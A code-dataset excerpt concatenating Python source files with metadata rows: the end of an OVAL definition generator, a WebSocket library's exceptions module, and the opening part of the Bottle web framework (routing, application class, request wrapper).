oval_element = self.registry_state_mappings.get(element)
method = 'set_' + oval_element.get('name')
getattr(oval_state,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
if oval_state.hasContent_():
oval_states.append(oval_state)
def generate_test_id(self):
self.test_id_base += 1
test_id = 'oval:' + self.id_namespace + ':tst:' + str(self.test_id_base)
return test_id
def generate_obj_id(self):
self.obj_id_base += 1
obj_id = 'oval:' + self.id_namespace + ':obj:' + str(self.obj_id_base)
return obj_id
def generate_ste_id(self):
self.ste_id_base += 1
ste_id = 'oval:' + self.id_namespace + ':ste:' + str(self.ste_id_base)
return ste_id
def generate_def_id(self):
self.def_id_base += 1
def_id = 'oval:' + self.id_namespace + ':def:' + str(self.def_id_base)
return def_id
| bsd-3-clause | -8,493,995,175,343,858,000 | 58.37931 | 180 | 0.597425 | false |
CylonicRaider/websocket-server | websocket_server/exceptions.py | 1 | 1127 | # websocket_server -- WebSocket/HTTP server/client library
# https://github.com/CylonicRaider/websocket-server
"""
Exceptions.
"""
__all__ = ['WebSocketError', 'ProtocolError', 'InvalidDataError',
'ConnectionClosedError']
class WebSocketError(Exception):
"""
Base class for all exceptions.
"""
class ProtocolError(WebSocketError):
"""
Exception for failure of the other side to adher to the protocol.
The "code" attribute contains the error code (a CLOSE_* from the
constants module) or None.
"""
def __init__(self, message, code=None):
"""
__init__(message, code=None) -> None
Initialize a ProtocolError instance. message is passed to the
superclass constructor, code is stored in the same-named
attribute.
"""
WebSocketError.__init__(self, message)
self.code = code
class InvalidDataError(ProtocolError, ValueError):
"""
Invalid data have been encountered.
"""
class ConnectionClosedError(WebSocketError):
"""
Raised when trying to write a message after the connection closed.
"""
| mit | -2,971,920,080,136,131,600 | 25.209302 | 70 | 0.657498 | false |
enckse/system-viewer | bottle.py | 1 | 146747 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2014, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.13-dev'
__license__ = 'MIT'
# The gevent and eventlet server adapters need to patch some modules before
# they are imported. This is why we parse the commandline parameters here but
# handle them later
if __name__ == '__main__':
from optparse import OptionParser
_cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
_opt = _cmd_parser.add_option
_opt("--version", action="store_true", help="show version number.")
_opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
_opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
_opt("-p", "--plugin", action="append", help="install additional plugin/s.")
_opt("--debug", action="store_true", help="start server in debug mode.")
_opt("--reload", action="store_true", help="auto-reload on file changes.")
_cmd_options, _cmd_args = _cmd_parser.parse_args()
if _cmd_options.server:
if _cmd_options.server.startswith('gevent'):
import gevent.monkey; gevent.monkey.patch_all()
elif _cmd_options.server.startswith('eventlet'):
import eventlet; eventlet.monkey_patch()
import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
from unicodedata import normalize
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (resticts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
from collections import MutableMapping as DictMixin
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
return s.encode(enc) if isinstance(s, unicode) else bytes(s)
def touni(s, enc='utf8', err='strict'):
if isinstance(s, bytes):
return s.decode(enc, err)
else:
return unicode(s or ("" if s is None else s))
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
from io import TextIOWrapper
class NCTextIOWrapper(TextIOWrapper):
def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
try:
functools.update_wrapper(wrapper, wrapped, *a, **ka)
except AttributeError:
pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, strict=False):
warnings.warn(message, DeprecationWarning, stacklevel=3)
def makelist(data): # This is just to handy
if isinstance(data, (tuple, list, set, dict)):
return list(data)
elif data:
return [data]
else:
return []
class DictProperty(object):
""" Property that maps to a key in a local dict-like attribute. """
def __init__(self, attr, key=None, read_only=False):
self.attr, self.key, self.read_only = attr, key, read_only
def __call__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter, self.key = func, self.key or func.__name__
return self
def __get__(self, obj, cls):
if obj is None: return self
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
if self.read_only: raise AttributeError("Read-Only property.")
del getattr(obj, self.attr)[self.key]
class cached_property(object):
""" A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property. """
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None: return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
class lazy_attribute(object):
""" A property that caches itself to the class object. """
def __init__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter = func
def __get__(self, obj, cls):
value = self.getter(cls)
setattr(cls, self.__name__, value)
return value
###############################################################################
# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
""" A base class for exceptions used by bottle. """
pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
""" This is a base class for all routing related exceptions """
class RouteReset(BottleException):
""" If raised by a plugin or request handler, the route is reset and all
plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass
class RouteSyntaxError(RouteError):
""" The route parser found something not supported by this router. """
class RouteBuildError(RouteError):
""" The route could not be built. """
def _re_flatten(p):
""" Turn all capturing groups in a regular expression pattern into
non-capturing groups. """
if '(' not in p:
return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
class Router(object):
""" A Router is an ordered collection of route->target pairs. It is used to
efficiently match WSGI requests against a number of routes and return
the first target that satisfies the request. The target may be anything,
usually a string, ID or callable object. A route consists of a path-rule
and a HTTP method.
The path-rule is either a static path (e.g. `/contact`) or a dynamic
path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
and details on the matching order are described in docs:`routing`.
"""
default_pattern = '[^/]+'
default_filter = 're'
#: The current CPython regexp implementation does not allow more
#: than 99 matching groups per regular expression.
_MAX_GROUPS_PER_PATTERN = 99
def __init__(self, strict=False):
self.rules = [] # All rules in order
self._groups = {} # index of regexes to find them in dyna_routes
self.builder = {} # Data structure for the url builder
self.static = {} # Search structure for static routes
self.dyna_routes = {}
self.dyna_regexes = {} # Search structure for dynamic routes
#: If true, static routes are no longer checked first.
self.strict_order = strict
self.filters = {
're': lambda conf:
(_re_flatten(conf or self.default_pattern), None, None),
'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
'path': lambda conf: (r'.+?', None, None)}
def add_filter(self, name, func):
""" Add a filter. The provided function is called with the configuration
string as parameter and must return a (regexp, to_python, to_url) tuple.
The first element is a string, the last two are callables or None. """
self.filters[name] = func
rule_syntax = re.compile('(\\\\*)'
'(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'
'|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'
'(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
def _itertokens(self, rule):
offset, prefix = 0, ''
for match in self.rule_syntax.finditer(rule):
prefix += rule[offset:match.start()]
g = match.groups()
if len(g[0])%2: # Escaped wildcard
prefix += match.group(0)[len(g[0]):]
offset = match.end()
continue
if prefix:
yield prefix, None, None
name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
yield name, filtr or 'default', conf or None
offset, prefix = match.end(), ''
if offset <= len(rule) or prefix:
yield prefix+rule[offset:], None, None
def add(self, rule, method, target, name=None):
""" Add a new rule or replace the target for an existing rule. """
anons = 0 # Number of anonymous wildcards found
keys = [] # Names of keys
pattern = '' # Regular expression pattern with named groups
filters = [] # Lists of wildcard input filters
builder = [] # Data structure for the URL builder
is_static = True
for key, mode, conf in self._itertokens(rule):
if mode:
is_static = False
if mode == 'default': mode = self.default_filter
mask, in_filter, out_filter = self.filters[mode](conf)
if not key:
pattern += '(?:%s)' % mask
key = 'anon%d' % anons
anons += 1
else:
pattern += '(?P<%s>%s)' % (key, mask)
keys.append(key)
if in_filter: filters.append((key, in_filter))
builder.append((key, out_filter or str))
elif key:
pattern += re.escape(key)
builder.append((None, key))
self.builder[rule] = builder
if name: self.builder[name] = builder
if is_static and not self.strict_order:
self.static.setdefault(method, {})
self.static[method][self.build(rule)] = (target, None)
return
try:
re_pattern = re.compile('^(%s)$' % pattern)
re_match = re_pattern.match
except re.error:
raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
if filters:
def getargs(path):
url_args = re_match(path).groupdict()
for name, wildcard_filter in filters:
try:
url_args[name] = wildcard_filter(url_args[name])
except ValueError:
raise HTTPError(400, 'Path has wrong format.')
return url_args
elif re_pattern.groupindex:
def getargs(path):
return re_match(path).groupdict()
else:
getargs = None
flatpat = _re_flatten(pattern)
whole_rule = (rule, flatpat, target, getargs)
if (flatpat, method) in self._groups:
if DEBUG:
msg = 'Route <%s %s> overwrites a previously defined route'
warnings.warn(msg % (method, rule), RuntimeWarning)
self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
else:
self.dyna_routes.setdefault(method, []).append(whole_rule)
self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
self._compile(method)
def _compile(self, method):
all_rules = self.dyna_routes[method]
comborules = self.dyna_regexes[method] = []
maxgroups = self._MAX_GROUPS_PER_PATTERN
for x in range(0, len(all_rules), maxgroups):
some = all_rules[x:x+maxgroups]
combined = (flatpat for (_, flatpat, _, _) in some)
combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
combined = re.compile(combined).match
rules = [(target, getargs) for (_, _, target, getargs) in some]
comborules.append((combined, rules))
def build(self, _name, *anons, **query):
""" Build an URL by filling the wildcards in a rule. """
builder = self.builder.get(_name)
if not builder: raise RouteBuildError("No route with that name.", _name)
try:
for i, value in enumerate(anons): query['anon%d'%i] = value
url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
return url if not query else url+'?'+urlencode(query)
except KeyError:
raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
def match(self, environ):
""" Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). """
verb = environ['REQUEST_METHOD'].upper()
path = environ['PATH_INFO'] or '/'
if verb == 'HEAD':
methods = ['PROXY', verb, 'GET', 'ANY']
else:
methods = ['PROXY', verb, 'ANY']
for method in methods:
if method in self.static and path in self.static[method]:
target, getargs = self.static[method][path]
return target, getargs(path) if getargs else {}
elif method in self.dyna_regexes:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
target, getargs = rules[match.lastindex - 1]
return target, getargs(path) if getargs else {}
# No matching route found. Collect alternative methods for 405 response
allowed = set([])
nocheck = set(methods)
for method in set(self.static) - nocheck:
if path in self.static[method]:
allowed.add(verb)
for method in set(self.dyna_regexes) - allowed - nocheck:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
allowed.add(method)
if allowed:
allow_header = ",".join(sorted(allowed))
raise HTTPError(405, "Method not allowed.", Allow=allow_header)
# No matching route and no alternative method found. We give up
raise HTTPError(404, "Not found: " + repr(path))
class Route(object):
""" This class wraps a route callback along with route specific metadata and
configuration and applies Plugins on demand. It is also responsible for
turing an URL path rule into a regular expression usable by the Router.
"""
def __init__(self, app, rule, method, callback, name=None,
plugins=None, skiplist=None, **config):
#: The application this route is installed to.
self.app = app
#: The path-rule string (e.g. ``/wiki/:page``).
self.rule = rule
#: The HTTP method as a string (e.g. ``GET``).
self.method = method
#: The original callback with no plugins applied. Useful for introspection.
self.callback = callback
#: The name of the route (if specified) or ``None``.
self.name = name or None
#: A list of route-specific plugins (see :meth:`Bottle.route`).
self.plugins = plugins or []
#: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
self.skiplist = skiplist or []
#: Additional keyword arguments passed to the :meth:`Bottle.route`
#: decorator are stored in this dictionary. Used for route-specific
#: plugin configuration and meta-data.
self.config = ConfigDict().load_dict(config)
@cached_property
def call(self):
""" The route callback with all plugins applied. This property is
created on demand and then cached to speed up subsequent requests."""
return self._make_callback()
def reset(self):
""" Forget any cached values. The next time :attr:`call` is accessed,
all plugins are re-applied. """
self.__dict__.pop('call', None)
def prepare(self):
""" Do all on-demand work immediately (useful for debugging)."""
self.call
def all_plugins(self):
""" Yield all Plugins affecting this route. """
unique = set()
for p in reversed(self.app.plugins + self.plugins):
if True in self.skiplist: break
name = getattr(p, 'name', False)
if name and (name in self.skiplist or name in unique): continue
if p in self.skiplist or type(p) in self.skiplist: continue
if name: unique.add(name)
yield p
def _make_callback(self):
callback = self.callback
for plugin in self.all_plugins():
try:
if hasattr(plugin, 'apply'):
callback = plugin.apply(callback, self)
else:
callback = plugin(callback)
except RouteReset: # Try again with changed configuration.
return self._make_callback()
if not callback is self.callback:
update_wrapper(callback, self.callback)
return callback
def get_undecorated_callback(self):
""" Return the callback. If the callback is a decorated function, try to
recover the original function. """
func = self.callback
func = getattr(func, '__func__' if py3k else 'im_func', func)
closure_attr = '__closure__' if py3k else 'func_closure'
while hasattr(func, closure_attr) and getattr(func, closure_attr):
func = getattr(func, closure_attr)[0].cell_contents
return func
def get_callback_args(self):
""" Return a list of argument names the callback (most likely) accepts
as keyword arguments. If the callback is a decorated function, try
to recover the original function before inspection. """
return getargspec(self.get_undecorated_callback())[0]
def get_config(self, key, default=None):
""" Lookup a config field and return its value, first checking the
route.config, then route.app.config."""
for conf in (self.config, self.app.conifg):
if key in conf: return conf[key]
return default
def __repr__(self):
cb = self.get_undecorated_callback()
return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
""" Each Bottle object represents a single, distinct web application and
consists of routes, callbacks, plugins, resources and configuration.
Instances are callable WSGI applications.
:param catchall: If true (default), handle all exceptions. Turn off to
let debugging middleware handle exceptions.
"""
def __init__(self, catchall=True, autojson=True):
#: A :class:`ConfigDict` for app specific configuration.
self.config = ConfigDict()
self.config._on_change = functools.partial(self.trigger_hook, 'config')
self.config.meta_set('autojson', 'validate', bool)
self.config.meta_set('catchall', 'validate', bool)
self.config['catchall'] = catchall
self.config['autojson'] = autojson
#: A :class:`ResourceManager` for application files
self.resources = ResourceManager()
self.routes = [] # List of installed :class:`Route` instances.
self.router = Router() # Maps requests to :class:`Route` instances.
self.error_handler = {}
# Core plugins
self.plugins = [] # List of installed plugins.
if self.config['autojson']:
self.install(JSONPlugin())
self.install(TemplatePlugin())
#: If true, most exceptions are caught and returned as :exc:`HTTPError`
catchall = DictProperty('config', 'catchall')
__hook_names = 'before_request', 'after_request', 'app_reset', 'config'
__hook_reversed = 'after_request'
@cached_property
def _hooks(self):
return dict((name, []) for name in self.__hook_names)
def add_hook(self, name, func):
""" Attach a callback to a hook. Three hooks are currently implemented:
before_request
Executed once before each request. The request context is
available, but no routing has happened yet.
after_request
Executed once after each request regardless of its outcome.
app_reset
Called whenever :meth:`Bottle.reset` is called.
"""
if name in self.__hook_reversed:
self._hooks[name].insert(0, func)
else:
self._hooks[name].append(func)
def remove_hook(self, name, func):
""" Remove a callback from a hook. """
if name in self._hooks and func in self._hooks[name]:
self._hooks[name].remove(func)
return True
def trigger_hook(self, __name, *args, **kwargs):
""" Trigger a hook and return a list of results. """
return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
def hook(self, name):
""" Return a decorator that attaches a callback to a hook. See
:meth:`add_hook` for details."""
def decorator(func):
self.add_hook(name, func)
return func
return decorator
def mount(self, prefix, app, **options):
""" Mount an application (:class:`Bottle` or plain WSGI) to a specific
URL prefix. Example::
root_app.mount('/admin/', admin_app)
:param prefix: path prefix or `mount-point`. If it ends in a slash,
that slash is mandatory.
:param app: an instance of :class:`Bottle` or a WSGI application.
All other parameters are passed to the underlying :meth:`route` call.
"""
segments = [p for p in prefix.split('/') if p]
if not segments: raise ValueError('Empty path prefix.')
path_depth = len(segments)
def mountpoint_wrapper():
try:
request.path_shift(path_depth)
rs = HTTPResponse([])
def start_response(status, headerlist, exc_info=None):
if exc_info:
_raise(*exc_info)
rs.status = status
for name, value in headerlist: rs.add_header(name, value)
return rs.body.append
body = app(request.environ, start_response)
if body and rs.body: body = itertools.chain(rs.body, body)
rs.body = body or rs.body
return rs
finally:
request.path_shift(-path_depth)
options.setdefault('skip', True)
options.setdefault('method', 'PROXY')
options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
options['callback'] = mountpoint_wrapper
self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
if not prefix.endswith('/'):
self.route('/' + '/'.join(segments), **options)
def merge(self, routes):
""" Merge the routes of another :class:`Bottle` application or a list of
:class:`Route` objects into this application. The routes keep their
'owner', meaning that the :data:`Route.app` attribute is not
changed. """
if isinstance(routes, Bottle):
routes = routes.routes
for route in routes:
self.add_route(route)
def install(self, plugin):
""" Add a plugin to the list of plugins and prepare it for being
applied to all routes of this application. A plugin may be a simple
decorator or an object that implements the :class:`Plugin` API.
"""
if hasattr(plugin, 'setup'): plugin.setup(self)
if not callable(plugin) and not hasattr(plugin, 'apply'):
raise TypeError("Plugins must be callable or implement .apply()")
self.plugins.append(plugin)
self.reset()
return plugin
def uninstall(self, plugin):
""" Uninstall plugins. Pass an instance to remove a specific plugin, a type
object to remove all plugins that match that type, a string to remove
all plugins with a matching ``name`` attribute or ``True`` to remove all
plugins. Return the list of removed plugins. """
removed, remove = [], plugin
for i, plugin in list(enumerate(self.plugins))[::-1]:
if remove is True or remove is plugin or remove is type(plugin) \
or getattr(plugin, 'name', True) == remove:
removed.append(plugin)
del self.plugins[i]
if hasattr(plugin, 'close'): plugin.close()
if removed: self.reset()
return removed
def reset(self, route=None):
""" Reset all routes (force plugins to be re-applied) and clear all
caches. If an ID or route object is given, only that specific route
is affected. """
if route is None: routes = self.routes
elif isinstance(route, Route): routes = [route]
else: routes = [self.routes[route]]
for route in routes: route.reset()
if DEBUG:
for route in routes: route.prepare()
self.trigger_hook('app_reset')
def close(self):
""" Close the application and all installed plugins. """
for plugin in self.plugins:
if hasattr(plugin, 'close'): plugin.close()
def run(self, **kwargs):
""" Calls :func:`run` with the same parameters. """
run(self, **kwargs)
def match(self, environ):
""" Search for a matching route and return a (:class:`Route` , urlargs)
tuple. The second value is a dictionary with parameters extracted
from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
return self.router.match(environ)
def get_url(self, routename, **kargs):
""" Return a string that matches a named route """
scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
location = self.router.build(routename, **kargs).lstrip('/')
return urljoin(urljoin('/', scriptname), location)
def add_route(self, route):
""" Add a route object, but do not change the :data:`Route.app`
attribute."""
self.routes.append(route)
self.router.add(route.rule, route.method, route, name=route.name)
if DEBUG: route.prepare()
def route(self, path=None, method='GET', callback=None, name=None,
apply=None, skip=None, **config):
""" A decorator to bind a function to a request URL. Example::
@app.route('/hello/:name')
def hello(name):
return 'Hello %s' % name
The ``:name`` part is a wildcard. See :class:`Router` for syntax
details.
:param path: Request path or a list of paths to listen to. If no
path is specified, it is automatically generated from the
signature of the function.
:param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
methods to listen to. (default: `GET`)
:param callback: An optional shortcut to avoid the decorator
syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
:param name: The name for this route. (default: None)
:param apply: A decorator or plugin or a list of plugins. These are
applied to the route callback in addition to installed plugins.
:param skip: A list of plugins, plugin classes or names. Matching
plugins are not installed to this route. ``True`` skips all.
Any additional keyword arguments are stored as route-specific
configuration and passed to plugins (see :meth:`Plugin.apply`).
"""
if callable(path): path, callback = None, path
plugins = makelist(apply)
skiplist = makelist(skip)
def decorator(callback):
if isinstance(callback, basestring): callback = load(callback)
for rule in makelist(path) or yieldroutes(callback):
for verb in makelist(method):
verb = verb.upper()
route = Route(self, rule, verb, callback, name=name,
plugins=plugins, skiplist=skiplist, **config)
self.add_route(route)
return callback
return decorator(callback) if callback else decorator
def get(self, path=None, method='GET', **options):
""" Equals :meth:`route`. """
return self.route(path, method, **options)
def post(self, path=None, method='POST', **options):
""" Equals :meth:`route` with a ``POST`` method parameter. """
return self.route(path, method, **options)
def put(self, path=None, method='PUT', **options):
""" Equals :meth:`route` with a ``PUT`` method parameter. """
return self.route(path, method, **options)
def delete(self, path=None, method='DELETE', **options):
""" Equals :meth:`route` with a ``DELETE`` method parameter. """
return self.route(path, method, **options)
def patch(self, path=None, method='PATCH', **options):
""" Equals :meth:`route` with a ``PATCH`` method parameter. """
return self.route(path, method, **options)
def error(self, code=500):
""" Decorator: Register an output handler for a HTTP error code"""
def wrapper(handler):
self.error_handler[int(code)] = handler
return handler
return wrapper
def default_error_handler(self, res):
return tob(template(ERROR_PAGE_TEMPLATE, e=res))
def _handle(self, environ):
path = environ['bottle.raw_path'] = environ['PATH_INFO']
if py3k:
try:
environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
except UnicodeError:
return HTTPError(400, 'Invalid path string. Expected UTF-8')
try:
environ['bottle.app'] = self
request.bind(environ)
response.bind()
try:
self.trigger_hook('before_request')
route, args = self.router.match(environ)
environ['route.handle'] = route
environ['bottle.route'] = route
environ['route.url_args'] = args
return route.call(**args)
finally:
self.trigger_hook('after_request')
except HTTPResponse:
return _e()
except RouteReset:
route.reset()
return self._handle(environ)
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
stacktrace = format_exc()
environ['wsgi.errors'].write(stacktrace)
return HTTPError(500, "Internal Server Error", _e(), stacktrace)
def _cast(self, out, peek=None):
""" Try to convert the parameter into something WSGI compatible and set
correct HTTP headers when possible.
Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
iterable of strings and iterable of unicodes
"""
# Empty output is done here
if not out:
if 'Content-Length' not in response:
response['Content-Length'] = 0
return []
# Join lists of byte or unicode strings. Mixed lists are NOT supported
if isinstance(out, (tuple, list))\
and isinstance(out[0], (bytes, unicode)):
out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
# Encode unicode strings
if isinstance(out, unicode):
out = out.encode(response.charset)
# Byte Strings are just returned
if isinstance(out, bytes):
if 'Content-Length' not in response:
response['Content-Length'] = len(out)
return [out]
# HTTPError or HTTPException (recursive, because they may wrap anything)
# TODO: Handle these explicitly in handle() or make them iterable.
if isinstance(out, HTTPError):
out.apply(response)
out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
return self._cast(out)
if isinstance(out, HTTPResponse):
out.apply(response)
return self._cast(out.body)
# File-like objects.
if hasattr(out, 'read'):
if 'wsgi.file_wrapper' in request.environ:
return request.environ['wsgi.file_wrapper'](out)
elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
return WSGIFileWrapper(out)
# Handle Iterables. We peek into them to detect their inner type.
try:
iout = iter(out)
first = next(iout)
while not first:
first = next(iout)
except StopIteration:
return self._cast('')
except HTTPResponse:
first = _e()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except:
if not self.catchall: raise
first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
# These are the inner types allowed in iterator or generator objects.
if isinstance(first, HTTPResponse):
return self._cast(first)
elif isinstance(first, bytes):
new_iter = itertools.chain([first], iout)
elif isinstance(first, unicode):
encoder = lambda x: x.encode(response.charset)
new_iter = imap(encoder, itertools.chain([first], iout))
else:
msg = 'Unsupported response type: %s' % type(first)
return self._cast(HTTPError(500, msg))
if hasattr(out, 'close'):
new_iter = _closeiter(new_iter, out.close)
return new_iter
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
start_response(response._status_line, response.headerlist)
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except:
if not self.catchall: raise
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(_e())), html_escape(format_exc()))
environ['wsgi.errors'].write(err)
headers = [('Content-Type', 'text/html; charset=UTF-8')]
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
return [tob(err)]
def __call__(self, environ, start_response):
""" Each instance of :class:'Bottle' is a WSGI application. """
return self.wsgi(environ, start_response)
def __enter__(self):
""" Use this application as default for all module-level shortcuts. """
default_app.push(self)
return self
def __exit__(self, exc_type, exc_value, traceback):
default_app.pop()
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ', )
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
@DictProperty('environ', 'bottle.app', read_only=True)
def app(self):
""" Bottle application handling this request. """
raise RuntimeError('This request is not connected to an application.')
@DictProperty('environ', 'bottle.route', read_only=True)
def route(self):
""" The bottle :class:`Route` object that matches this request. """
raise RuntimeError('This request is not connected to a route.')
@DictProperty('environ', 'route.url_args', read_only=True)
def url_args(self):
""" The arguments extracted from the URL. """
raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
""" The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). """
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
""" The ``REQUEST_METHOD`` value as an uppercase string. """
return self.environ.get('REQUEST_METHOD', 'GET').upper()
@DictProperty('environ', 'bottle.request.headers', read_only=True)
def headers(self):
""" A :class:`WSGIHeaderDict` that provides case-insensitive access to
HTTP request headers. """
return WSGIHeaderDict(self.environ)
def get_header(self, name, default=None):
""" Return the value of a request header, or a given default value. """
return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
